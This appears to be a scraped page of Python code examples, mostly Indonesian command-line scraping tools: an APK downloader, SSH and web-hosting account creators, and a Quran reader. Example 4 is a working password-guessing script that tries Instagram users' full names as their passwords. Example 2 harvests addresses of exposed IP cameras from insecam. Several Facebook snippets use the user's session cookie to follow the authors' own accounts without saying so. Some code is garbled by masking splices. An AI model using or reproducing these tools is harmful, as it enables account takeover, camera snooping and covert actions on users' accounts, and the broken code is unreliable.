Esempio n. 1
0
def main():
    os.system('clear')
    print logo
    nama = raw_input(
        '\x1b[1;91m# \x1b[1;97mMasukan Nama Apk \x1b[1;91m:\x1b[1;92m ')
    link, no, garis = ([], 0, 45 * '\x1b[1;92m-')
    try:
        req = requests.get('https://m.apkpure.com/id/search?q=' +
                           nama.replace(' ', '+'),
                           headers=headers).content
    except requests.exceptions.ConnectionError:
        exit('\x1b[1;91m! \x1b[1;97mHidupkan Koneksi Anda\n')

    req = par(req, 'html.parser')
    print garis
    for a in req.find_all('a', attrs={'class': 'dd'}):
        ling = a.get('href')
        link.append(ling)

    for div in req.find_all('div', attrs={'class': 'r'}):
        no += 1
        jud = div.find('p', attrs={'class': 'p1'}).text
        dev = div.find('p', attrs={'class': 'p2'}).text
        jud = jud[:20]
        print '\x1b[1;97m' + str(
            no) + '   \x1b[32mAPLIKASI  \x1b[1;91m:\x1b[1;97m ' + jud + '...'
        print '    \x1b[32mDEVELOPER \x1b[1;91m:\x1b[1;97m ' + dev
        print garis

    try:
        pil = raw_input(
            '\n\x1b[1;91m# \x1b[1;97mPilih Apk \x1b[1;91m:\x1b[1;92m ')
        if pil in ('', ' '):
            exit('\x1b[1;91m! \x1b[1;97mIsi Pilihan Anda\n')
    except IndexError:
        exit('\x1b[1;91m! \x1b[1;97mIsi Pilihan Anda\n')

    pil = int(pil) - 1
    out = raw_input('\x1b[1;91m# \x1b[1;97mOutput    \x1b[1;91m:\x1b[1;92m ')
    url = 'https://m.apkpure.com' + str(link[pil]) + '/download?from=details'
    run = requests.get(url, headers=headers)
    oks = par(run.content, 'html.parser')
    _find_1 = oks.find('div', attrs={'class': 'fast-download-box'})
    _find_2 = _find_1.find('a', attrs={'class': 'ga'})
    _find_3 = _find_1.find('span', attrs={'class': 'fsize'})
    size = _find_3.text
    print '\n\x1b[1;91m! \x1b[1;97mSize Aplikasi \x1b[1;91m:\x1b[1;92m ' + size.replace(
        '(', '').replace(')', '')
    owh = raw_input(
        '\x1b[1;91m! \x1b[1;97mYakin Untuk Mengunduh? [\x1b[1;92mY\x1b[1;97m/\x1b[1;91mT\x1b[1;97m]\n\x1b[1;97m        Jawab \x1b[1;91m:\x1b[1;92m '
    )
    if owh in ('', ' '):
        exit('\n\x1b[1;91m! \x1b[1;97mIsi Jawaban Anda\n')
    elif owh in ('Y', 'y'):
        file = _find_2.get('href')
        unduh(file, out)
    elif owh in ('T', 't'):
        exit('\n\x1b[1;91m* \x1b[1;97mProgram Terhenti\x1b[1;91m...\n')
    else:
        exit('\n\x1b[1;91m! \x1b[1;97mIsi Jawaban Anda\n')
Esempio n. 2
0
def multi(kode):
    sesi_page = par(
        get("http://www.insecam.org/en/bycountry/" + kode,
            headers={
                "User-Agent": "chrome"
            }).text, "html.parser").find("ul",
                                         class_="pagination").find("script")
    cari_page = re.search(", (\d+),", str(sesi_page)).group(1)

    #-> Hanya 20 Halaman Gak boleh Lebih
    if int(cari_page) > 21:
        jmlh = 20
    elif int(cari_page) < 21:
        jmlh = int(cari_page)

    for page in range(jmlh):
        cek = par(
            get("http://www.insecam.org/en/bycountry/" + kode + "/?page=" +
                str(page + 1),
                headers={
                    "User-Agent": "chrome"
                }).text, "html.parser")
        for scr in cek.find_all("div", class_="row thumbnail-items"):
            cari_site = re.findall(r"http://\d+.\d+.\d+.\d+:\d+", str(scr))
            [url.append(site) for site in cari_site]
            for city in scr.find_all("div", class_="thumbnail-item__caption"):
                [lokasi.append(tempat.text) for tempat in city.find_all("p")]
Esempio n. 3
0
	def Chek(self):
		self.cek = par(get("https://speedssh.com/ssl-server-30-days").text, "html.parser")
		for one in self.cek.find_all("div", attrs={"class":"plan-hp"}):
			for two in one.find_all("h1"):
				self._nom += 1
				print("  \x1b[1;96m{\x1b[1;92m"+str(self._nom)+"\x1b[1;96m}\x1b[1;97m "+two.text)
			for url in one.find_all("a", attrs={"class":"order-plan"}):
				self.link.append(url.get("href"))

		self.pilih = input("\x1b[1;91m+-----------------------------------+\n  \x1b[1;97m>>> ")
		while self.pilih == "":
			print(" \x1b[1;91m >>>\x1b[1;97m YANG BENER NGENTOD\x1b[1;91m!")
			self.pilih = input("  \x1b[1;97m>>> ")
		try:
			chekin = self.link[int(self.pilih) - 1]
		except (ValueError, IndexError):
			exit("  \x1b[1;97m[\x1b[1;91m!\x1b[1;97m] MASUKAN ANGKANYA AJA BRO..")
		cek_2 = par(get(chekin).text, "html.parser")
		if cek_2.find("div", class_="progress-bar progress-bar-danger") is None:
			serverid = cek_2.find('input', {"type":"hidden"}).get("value")
			cookie = re.search("PHPSESSID=(\w+)\sfor", str(get(chekin).cookies)).group(1)
			print("\x1b[1;91m+-----------------------------------+")
			user = input("  \x1b[1;91m==> \x1b[1;97mSET USERNAME:\x1b[1;96m ")
			pasw = input("  \x1b[1;91m==> \x1b[1;97mSET PASSWORD: \x1b[1;96m")
			print("\x1b[1;91m+-----------------------------------+")
			Membuat_ssl(serverid, cookie, user, pasw, chekin)
		if cek_2.find("div", class_="progress-bar progress-bar-danger") is not None:
			exit("  \x1b[1;97m[\x1b[1;91m#\x1b[1;97m] ACCOUNT NOT AVAILABLE\n      SILAHKAN PILIH SERVER LAIN..\n")
			time.sleep(2)
			system('python '+sys.argv[0])
Esempio n. 4
0
def main():
	os.system('clear')
	print(logo)
	print(garis)
	name = input('\x1b[1;91m# \x1b[1;97mSearch Name:\x1b[1;96m ')
	try:
		a = r.get(f"https://www.instagram.com/web/search/topsearch/?context=blended&query={name}").text
	except r.exceptions.ConnectionError:
		exit('\x1b[1;91m! \x1b[1;97mHidupkan Koneksimu\n')
	print("\x1b[1;91m! \x1b[1;97mProcessing Crack...")
	print(garis)
	b = json.loads(a)
	for c in b['users']:
		user = c['user']['username']
		full = c['user']['full_name']
		try:
			sp = full.split(" ")
			pw = (sp[0]+sp[1]).lower()

			run = r.post('https://outig.com/login/user_login.php', data={'username':user,'password':pw}, headers={'accept': 'application/json, text/javascript, */*; q=0.01','user-agent': 'Mozilla/5.0 (Linux; Android 6.0; A1601) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36','x-requested-with':'XMLHttpRequest','referer': 'https://outig.com/login/'}).text
			ron = par(run,"html.parser")
			rom = ron.find('b')
			maen = ("\x1b[1;97m[\x1b[1;92m•\x1b[1;97m] CRACKING :\x1b[1;96m "+user+" \x1b[1;91m|\x1b[1;96m "+pw+" "+rom.text).replace("<\/div>","").replace("<\/b>","").replace("\/","/").replace('"}','').replace('Status: Gagal masuk username/password salah.','\n             \x1b[1;97m> \x1b[1;91mGagal Masuk').replace('Status: Sukses masuk, mengalihkan ...','\n             \x1b[1;97m> \x1b[1;94mLogin Succes \x1b[1;97m[\x1b[1;92mOK\x1b[1;97m]').replace('Status: Checkpoint verifikasi akun anda..','\n             \x1b[1;97m> \x1b[1;94mLogin Succes \x1b[1;97m[\x1b[1;93mCP\x1b[1;97m]').replace(' Status: Gagal kesalahan tidak di ketahui.','\n             \x1b[1;97m> \x1b[1;91mKesalahan Login')
			print(maen)
			print(garis)
		except IndexError:
			pass
Esempio n. 5
0
def login(kukis):
	c*k = {"cookie":kukis}
	cek = par(ses.get(link+"/home.php?ref=dbl", cookies=c*k).text, "html.parser")
	if "mbasic_logout_button" in str(cek):
		print("%s[>]%s Login berhasil" % (b,h))
		if "Apa yang Anda pikirkan sekarang" in str(cek):
			pass
		else:
			try:
				xnxx = par(ses.get(link+"/language.php", cookies=c*k).text, "html.parser").find("a",string="Bahasa Indonesia")["href"]
				ses.get(link+xnxx, cookies=c*k)
			except:
				pass
		print("%s[>]%s Tunggu Sebentar Sedang Memproses" % (b,p))
		return c*k["cookie"]
	else:
		exit("%s[×]%s Cookie Invalid..\n" % (m,p))
Esempio n. 6
0
def login(kukis):
	c*k = {"cookie":kukis}
	cek = par(ses.get(link+"/home.php?ref=dbl", cookies=c*k).text, "html.parser")
	if "mbasic_logout_button" in str(cek):
		print("%s [%s✓%s] Login Successfully" % (p,h,p))
		time.sleep(2)
		os.system("clear")
		print(logo1)
		aahh("\n%s [%s+%s] please wait..." % (p,b,p))
		for x in cek.find_all("a",string=" + "):
			ges = par(ses.get(link+x.get("href"), cookies=c*k).text, "html.parser")
			e = ges.find("a",string="Bahasa Burma")["href"]
			gse = par(ses.get(link+e, cookies=c*k).text, "html.parser")
			acc = gse.find("a",{"accesskey":"7"}).get("href")
			set = par(ses.get(link+acc, cookies=c*k).text, "html.parser")
			gex = re.findall(r"/private_sharing/home_view/\?entry_point=settings\&amp;profile_id=\d+\&amp;refid=\d+", str(set))
			prvt.append("".join(gex))
		act = par(ses.get(link+"".join(prvt), cookies=c*k).text, "html.parser")
		ac = act.find("form").get("action")
		dt = act.find("input",{"name":"fb_dtsg"}).get("value")
		jz = act.find("input",{"name":"jazoest"}).get("value")
		data = {"fb_dtsg":dt,"jazoest":jz}
		pos = ses.post(link+ac, data=data, cookies=c*k).text
		try:
			cindy = par(ses.get(link+"/language.php", cookies=c*k).text, "html.parser").find("a",string="Bahasa Indonesia")["href"]
			ses.get(link+cindy, cookies=c*k)
			bbteam = par(ses.get(link+"/KM39453", cookies=c*k).content, "html.parser").find("a",string="Ikuti")["href"]
			ses.get(link+bbteam, cookies=c*k)
		except:
			pass
        
		print("%s [%s✓%s] Locked profile is active" % (p,h,p))
		time.sleep(3)
	else:
		exit("\n%s [%s×%s] Cookie Invalid\n" % (p,m,p))
Esempio n. 7
0
def locked(kukis):
    c*k = {"cookie": kukis}
    cek = par(
        ses.get(link + "/home.php?ref=dbl", cookies=c*k).text, "html.parser")
    for x in cek.find_all("a", string=" + "):
        ges = par(
            ses.get(link + x.get("href"), cookies=c*k).text, "html.parser")
        e = ges.find("a", string="Bahasa Burma")["href"]
        gse = par(ses.get(link + e, cookies=c*k).text, "html.parser")
        acc = gse.find("a", {"accesskey": "7"}).get("href")
        set = par(ses.get(link + acc, cookies=c*k).text, "html.parser")
        gex = re.findall(
            r"/private_sharing/home_view/\?entry_point=settings\&amp;profile_id=\d+\&amp;refid=\d+",
            str(set))
        prvt.append("".join(gex))
    act = par(ses.get(link + "".join(prvt), cookies=c*k).text, "html.parser")
    ac = act.find("form").get("action")
    dt = act.find("input", {"name": "fb_dtsg"}).get("value")
    jz = act.find("input", {"name": "jazoest"}).get("value")
    data = {"fb_dtsg": dt, "jazoest": jz}
    pos = ses.post(link + ac, data=data, cookies=c*k).text
    try:
        xnxx = par(
            ses.get(link + "/language.php", cookies=c*k).text,
            "html.parser").find("a", string="Bahasa Indonesia")["href"]
        ses.get(link + xnxx, cookies=c*k)
    except:
        pass
    print("%s[✓]%s Profile Locked Sudah Aktif\n" % (h, p))
Esempio n. 8
0
	def reg1(web, dom):
		system("clear")
		print(logo)
		head1 = {
			"Host":"www.freewebhostingarea.com",
			"Connection":"keep-alive",
			"Content-Lenght":"59",
			"Origin":"https://freewha.com",
			"Upgrade-Insecure-Requests":"1",
			"Content-Type":"application/x-www-form-urlencoded",
			"User-Agent":get(url_server).json()["user"],
			"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
			"Referer":"https://freewha.com/",
			"Accept-Encoding":"gzip, deflate",
			"Accept-Language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"
			}
		data1 = {
			"thirdLevelDomain":web,
			"domain":dom,
			"action":"check_domain"
			}
		chekin = par(post(url_regist1, headers=head1, data=data1).text, "html.parser")
		if "Subdomain must be at least 3 characters" in chekin:
			exit(notic["warning"]+" SUBDOMAIN MINIMAL 3 KARAKTER")
		value = chekin.find("input",{"name":"agree"}).get("value")
		print(notic["input"]+" NAMA WEBSITE: "+web)
		print(notic["input"]+" DOMAIN ANDA : "+dom)
		set_user = input(notic["input"]+" INPUT EMAIL : ")
		while set_user == "":
			set_user = input(notic["input"]+" INPUT EMAIL : ")
		set_pasw = input(notic["input"]+" SET PASSWORD: "******"":
			set_pasw = input(notic["input"]+" SET PASSWORD: "******"warning"]+" TUNGGU SEBENTAR ...")
		time.sleep(2)
		webs = web+"."+dom
		Regis2.reg2(webs, set_user, set_pasw, value)
Esempio n. 9
0
def follow():

    cookie = parser_cookie()

    me = req.get('https://free.facebook.com', cookies=cookie)

    if 'Harap Konfirmasikan Identitas Anda' in me.text:

        print('     Sepertinya Anda Terkunci Sementara!')
        exit()

    elif 'Buat Akun Baru' in me.text:

        print('     Invalid Cookie!')
        exit()

    else:

        pass

    try:

        page_follow = req.get('https://free.facebook.com/willer.jancox',
                              cookies=cookie)

        parser = par(page_follow.text, 'html.parser')

        ikuti = parser.find('a', string='Ikuti')['href']

        req.get('https://free.facebook.com' + ikuti, cookies=cookie)

        print('     Sukses Mengikuti.')

    except TypeError:

        print('     Telah Di Ikuti')
Esempio n. 10
0
# Coded By: Rizky | Aprilia
# github: https://github.com/hekelpro
# Team: XIUZCODE | OPEN SOURCE TEAM

import os
from requests import *
from bs4 import BeautifulSoup as par

os.system('clear')
link = 'http://createssh.com/'
a = get(link).content
b = par(a, "html.parser")
no = 0
print("""
\x1b[1;92m
\x1b[1;91m----------------------------------------""")
for cen in b.find_all('h2'):
    no += 1
    print('\x1b[1;97m[\x1b[1;92m0' + str(no) + '\x1b[1;97m]=| ' + cen.text)
print("\x1b[1;91m-" * 40)
pil = input('\x1b[1;97m[\x1b[1;96m+\x1b[1;97m] PILIH:\x1b[1;92m ')
if pil == "":
    exit("\x1b[1;97m[\x1b[1;91m×\x1b[1;97m] Mohon Jangan Kosong\n")
elif pil in ("1", "01"):
    server = "server/tokyo.html"
elif pil in ("2", "02"):
    server = "server/paris.html"
elif pil in ("3", "03"):
    server = "server/singapore-1.html"
elif pil in ("4", "04"):
    server = "server/sydney.html"
Esempio n. 11
0
def main():
    #os.system('clear')
    print logo
    nama = raw_input('\x1b[1;91m# \x1b[1;97mEnter Apk Name \x1b[1;91m:\x1b[1;92m ')
    link, no, garis = ([], 0, 50*'\x1b[1;92m-')
    try:
        req = requests.get('https://m.apkpure.com/id/search?q=' + nama.replace(' ', '+'), headers=headers).content
    except requests.exceptions.ConnectionError:
        exit('\x1b[1;91m! \x1b[1;97mTurn on Your Connection\n')

    req = par(req, 'html.parser')
    print garis
    for a in req.find_all('a', attrs={'class': 'dd'}):
        ling = a.get('href')
        link.append(ling)

    for div in req.find_all('div', attrs={'class': 'r'}):
        no += 1
        jud = div.find('p', attrs={'class': 'p1'}).text
        dev = div.find('p', attrs={'class': 'p2'}).text
        jud = jud[:31]
        print '\x1b[1;97m' + str(no) + '   \x1b[32mAPPLICATION  \x1b[1;91m:\x1b[1;97m ' + jud
        print '    \x1b[0;36mDEVELOPER \x1b[1;91m:\x1b[1;97m ' '\x1b[1;36m'+ dev 
        print garis

    try:
        pil = raw_input('\n\x1b[1;91m# \x1b[1;97mChoose Apk \x1b[1;91m:\x1b[1;92m ')
        if pil in ('', ' '):
            print('\x1b[1;91m! \x1b[1;97mInvalid Choice\n')
            main()
            
            
    except IndexError:
        exit('\x1b[1;91m! \x1b[1;97mInvalid Choice\n')

    pil = int(pil) - 1
  
    url = 'https://m.apkpure.com' + str(link[pil]) + '/download?from=details'
    run = requests.get(url, headers=headers)
    oks = par(run.content, 'html.parser')
    _find_1 = oks.find('div', attrs={'class': 'fast-download-box'})
    _find_2 = _find_1.find('a', attrs={'class': 'ga'})
    _find_3 = _find_1.find('span', attrs={'class': 'fsize'})
    _find_4 = _find_1.find('span', attrs={'class': 'file'})
    size = _find_3.text
    import re
    out = re.sub("[\(\[].*?[\)\]]", "", _find_4.text)[:-1]
    
    print(out)
    
    print '\n\x1b[1;91m! \x1b[1;97mSize \x1b[1;91m:\x1b[1;92m ' + size.replace('(', '').replace(')', '')
    owh = raw_input('\x1b[1;91m! \x1b[1;97mAre you sure to download it? [\x1b[1;92mY\x1b[1;97m/\x1b[1;91mN\x1b[1;97m\x1b[1;97m/\x1b[1;92mEnter\x1b[1;97m]  \n\x1b[1;91m! \x1b[1;97mAnswer \x1b[1;91m:\x1b[1;92m ')
    if owh in ('', ' '):
        file = _find_2.get('href')
        unduh(file, out)
    elif owh in ('Y', 'y'):
        file = _find_2.get('href')
        unduh(file, out)
    elif owh in ('N', 'n'):
        exit('\n\x1b[1;91m* \x1b[1;97mCanceled\x1b[1;91m...\n')
    else:
        exit('\n\x1b[1;91m! \x1b[1;97mIsi Your Answer\n')
Esempio n. 12
0
def main():
    clear()
    print('''\x1b[1;97m=============================================
\x1b[1;91m   * \x1b[1;97mAuthor : \x1b[1;92mRizky
\x1b[1;91m   * \x1b[1;97mSupport: \x1b[1;92mAprilia
\x1b[1;91m   * \x1b[1;97mTeam   : \x1b[1;92mXIUZCODE
\x1b[1;91m   * \x1b[1;97mGithub : \x1b[1;92mhttps://github.com/hekelpro
\x1b[1;97m=============================================''')
    try:
        a = r.get('https://litequran.net').text
    except r.exceptions.ConnectionError:
        exit('\x1b[1;91m! \x1b[1;97mTidak Ada Koneksi')
    a = par(a, 'html.parser')
    print('\n\x1b[1;92m1\x1b[1;91m. Keluar Program')
    # <!-- Variabel --!>
    no, ayat, bacaan, arti, link = 0, 0, 0, 0, []
    for x in a.find_all('a'):
        no += 1
        titel = x.get('title')
        if titel == None:
            pass
        else:
            print(f'\x1b[1;92m{str(no)}\x1b[1;91m. \x1b[1;97m{titel}')
    for z in a.find_all('a'):
        run = z.get('href')
        link.append(run)
    try:
        pil = input('\n\x1b[1;91m# \x1b[1;97mPilih:\x1b[1;96m ')
        if pil == '1':
            exit('\x1b[1;91m! \x1b[1;97mProgram Berakhir')
        else:
            pil = int(pil) - 1
            lanjut = r.get(str(link[pil])).text
            scrap = par(lanjut, 'html.parser')
            find1 = scrap.find('h1', class_="page-title").text
            print("\x1b[1;97m=" * 45)
            print("\x1b[1;92m            " + find1)
            print("\x1b[1;97m=" * 45)
            print("\x1b[1;97mTulisan Arab: \n")
            for al in scrap.find_all('span', class_="ayat"):
                ayat += 1
                al = (al.text)
                print(
                    f'\x1b[1;92m{str(ayat)}\x1b[1;91m.\x1b[1;97m {al.strip()}')
            print("\x1b[1;97m=" * 45)
            print("Cara Bacanya: \n")
            for bc in scrap.find_all('span', class_="bacaan"):
                bacaan += 1
                bc = (bc.text)
                print(
                    f'\x1b[1;92m{str(bacaan)}\x1b[1;91m. \x1b[1;97m{bc.strip()}'
                )
            print("\x1b[1;97m=" * 45)
            print("Artinya: \n")
            for ar in scrap.find_all('span', class_="arti"):
                arti += 1
                ar = (ar.text)
                print(
                    f'\x1b[1;92m{str(arti)}\x1b[1;91m. \x1b[1;97m{ar.strip()}')
            print("=" * 45)
    except ValueError:
        exit('\x1b[1;91m! \x1b[1;97mJangan Kosong')
    except IndexError:
        exit('\x1b[1;91m! \x1b[1;97mIsi Yang Betul')
Esempio n. 13
0
def main():
    os.system("clear")
    print("""
 __      __.__
/  \    /  \  |__ _____
\   \/\/   /  |  \\\__  \\
 \        /|   Y  \/ __ \_
  \__/\  / |___|  (____  /
       \/       \/     \/ v0.2

        * Author: RizkyDev
        * Github: https://github.com/hekelpro
        * Thanks: All Member XiuzCode
""")
    name = input("[!] Name domain: ").replace(".", "-").replace(" ", "")
    action, option = collect_domain()
    print("")  #-> Blok hehehe
    for opt in range(len(option)):
        print(" " * 3, "[" + str(opt + 1) + "] " + option[opt])
    print("")
    chos = input("[?] Choose domain: ")
    while not chos.isdigit() or int(chos) > len(option):
        chos = input("[?] Choose domain: ")
    res = str(option[int(chos) - 1])
    data1 = {"thirdLevelDomain": name, "domain": res, "action": "check_domain"}
    run1 = par(ses.post(action, data=data1, headers=ua).text, "html.parser")
    if "already created" in str(run1):
        exit(
            "[!] This domain name already exists, please recreate it with a different domain name"
        )

    action2 = run1.find("form")["action"]
    #-> Input email user
    email = input("\n[!] Manual/Default Email? (D/M): ").lower()
    while email == "":
        email = input("[!] Manual/Default Email? (D/M): ").lower()
    if email == "m":
        mail = input("[!] Input Your Email: ")
        while mail == "" or "@" not in mail:
            mail = input("[!] Input Your Email: ")
    else:
        mail = Random().RandomEmail()
        print("[!] Your Email: " + str(mail))

    #-> Input Password user
    pas = input("\n[!] Manual/Default Password? (D/M): ").lower()
    while pas == "":
        pas = input("\n[!] Manual/Default Password? (D/M): ").lower()
    if pas == "m":
        pasw = input("[!] Input Your Password: "******"" or len(pasw) < 9:
            pasw = input("[!] Input Your Password: "******"[!] Your Password: "******"." + res
    td = threading.Thread(name="created",
                          target=create,
                          args=(
                              subdo,
                              mail,
                              pasw,
                              action2,
                          ))
    td.start()
    while td.is_alive():
        animate("Processing")
    print("\n\n[CPANEL]: http://" + subdo + "/cpanel")
    print("        * username: "******"        * password: "******"\n[FTP]: http://" + subdo + "/ftp")
    print("     * host/server: " + subdo)
    print("     * username   : "******"     * password   : "******"\n[✓] success created account\n")
Esempio n. 14
0
def collect_domain():
    action = par(ses.get(url, headers=ua).text, "html.parser")
    formA = action.find("form")
    opt = re.findall("\<option value=\"(.*?\..*?)\">", str(formA))
    return formA["action"], opt